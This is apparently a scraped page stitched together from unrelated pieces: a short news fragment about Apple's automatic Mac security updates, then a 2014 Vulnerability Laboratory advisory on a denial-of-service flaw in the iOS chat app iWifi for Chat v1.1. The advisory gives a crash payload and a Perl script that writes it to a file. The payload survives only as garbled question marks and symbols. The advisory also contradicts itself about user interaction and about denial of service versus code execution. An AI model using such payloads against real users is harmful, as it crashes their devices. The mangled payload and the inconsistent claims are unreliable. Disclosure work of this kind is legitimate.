Previously, Apple's security updates have required a computer user to accept the update. The company has actually had a method to automatically update computers for two years but is only now using it for the first time.

What if someone doesn't want automatic updates? Westin advises: "If you have a Mac system where an automatic update might introduce a problem -- or you are the paranoid type -- it can be disabled by going to the Apple Menu > System Preferences > App Store and unchecking Install system data files and security updates."

Source

[iWifi For Chat 1.1 Denial Of Service]

Document Title:
===============
iWifi for Chat v1.1 iOS - Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1375


Release Date:
=============
2014-12-16


Vulnerability Laboratory ID (VL-ID):
====================================
1376


Common Vulnerability Scoring System:
====================================
4.6


Product & Service Introduction:
===============================
iWifi for Chat lets you easily chat with your friends over Wifi in a fast and reliable way. 
The app is part of a bundle and is made by the seller ios developer.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/iwifi-for-chat/id512703175 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a remote denial of service vulnerability in the iWifi for Chat v1.1 iOS web-application.


Vulnerability Disclosure Timeline:
==================================
2014-12-16:  Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
iOS Developer
Product: iWifi for Chat - iOS Web Application 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A remote denial of service vulnerbaility has been discovered in the official iWifi for Chat v1.1 iOS web-application.
The vulnerbaility allows remote attackers to shutdown the service application by sending a special crafted chat message.

The vulnerability is located in the application message input context. Remote attackers are able to inject special chars 
to provoke an error that results in a app shutdown. The bug can be exploited by processing to send special crafted symbole 
messages through the context message input box. The vulnerability allows an attacker to crash the connected remote ios client.

The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring 
system) count of 4.6. Exploitation of the DoS vulnerability requires no privileged application user account but a connected 
chat user for interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise 
and affected or connected device component compromise.

Vulnerable Module(s):
        [+] Chat Message Input Box

Vulnerable Parameter(s):
        [+] message context

Affected Module(s):
        [+] iWifi for Chat v1.1


Proof of Concept (PoC):
=======================
The Vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For security demonstration or to reporduce the vulnerability follow the provided information and steps below to continue.


PoC: 1024 bytes - message context payload

?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬??????????????
???????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????


PoC: Exploit

#!/usr/local/bin/perl
 open (MYFILE, '>>exploitcode.txt');
 print MYFILE "?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬
?????????????????????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????\n";
 close (MYFILE); 


Security Risk:
==============
The security risk of the of the denial of service web vulnerability is estimated as medium. (CVSS 4.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

        Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source